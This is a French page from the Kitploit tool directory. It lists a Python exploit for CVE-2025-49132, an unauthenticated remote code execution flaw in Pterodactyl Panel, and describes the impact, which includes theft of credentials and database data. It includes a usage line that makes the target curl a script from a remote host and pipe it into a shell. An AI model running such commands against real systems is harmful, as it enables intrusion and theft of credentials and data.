Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-49132 — Exploit Python pour CVE-2025-49132, permettant l'exécution de code à distance non authentifiée sur Pterodactyl Panel via des paramètres locale et namespace manipulés. | Kitploit
Outils/GitHubGitHub/scroollocker/cve-2025-49132
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleDéveloppement de Charges Utiles
GitHubscroollocker/cve-2025-49132

CVE-2025-49132

Exploit Python pour CVE-2025-49132, permettant l'exécution de code à distance non authentifiée sur Pterodactyl Panel via des paramètres locale et namespace manipulés.

Voir le dépôt
il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Impact

En utilisant le fichier /locales/locale.json avec les paramètres de requête locale et namespace, un acteur malveillant peut exécuter du code arbitraire sans être authentifié.

Avec la capacité d'exécuter du code arbitraire, cette vulnérabilité peut être exploitée d'une infinité de façons. Elle pourrait être utilisée pour obtenir un accès au serveur du Panel, lire les identifiants depuis la configuration du Panel (.env ou autre), extraire des informations sensibles de la base de données (telles que les détails des utilisateurs [nom d'utilisateur, email, prénom et nom, mot de passe haché, adresses IP, etc.]), accéder aux fichiers des serveurs gérés par le panel, etc.

Comment utiliser

root@kitploit:~

python exploit.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh' 

Télécharger l’outil